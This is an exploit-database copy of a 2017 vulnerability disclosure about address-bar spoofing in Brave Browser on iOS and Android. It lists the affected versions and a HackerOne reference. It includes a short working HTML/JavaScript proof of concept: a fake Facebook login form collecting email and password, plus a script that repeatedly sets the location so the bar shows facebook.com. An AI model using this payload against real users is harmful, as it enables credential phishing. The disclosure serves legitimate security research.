Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017010042

Below is a copy:

Brave Browser Address Bar Spoofing Vulnerability ( iOS + Android ) Hello,

I am Aaditya Purani, I would like to Report Address Bar spoofing vulnerability in Brave Browser on the IOS as well as Android Platform. All the Test have been carried out against Latest Brave Browser whose versions i have mentioned in Products affected section.

Summary:

Brave Browser Suffers from Address Bar Spoofing Vulnerability. Address Bar spoofing is a critical vulnerability in which any attacker can spoof the address bar to a legit looking website but the content of the web-page remains different from the Address-Bar display of the site. In Simple words, the victim sees a familiar looking URL but the content is not from the same URL but the attacker controlled content. Some companies say "We recognize that the address bar is the only reliable security indicator in modern browsers" .

Products affected:

In IOS - Affected is the Latest Version 1.2.16 (16.09.30.10)
In Android - Affected in Brave Latest version 1.9.56

Exploit Code: 

<html> 
<title>Address Bar spoofing Brave</title> 
<h1> This is Dummy Facebook </h1> 
<form> 
Email: <input type="text" name="username" placeholder="add email"><br> 
Password: <input type="text" name="password" placeholder="pass"> 
<script> 
function f() 
{ 
location = "https://facebook.com" 
} 
setInterval("f()", 10); 
</script> 
</html>

Credits:

Aaditya Purani

Contact : 
https://aadityapurani.com
https://twitter.com/aaditya_purani

Proof Of Concept:
https://hackerone.com/reports/175958

With Kind Regards
Aaditya Purani 

Copyright ©2017 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.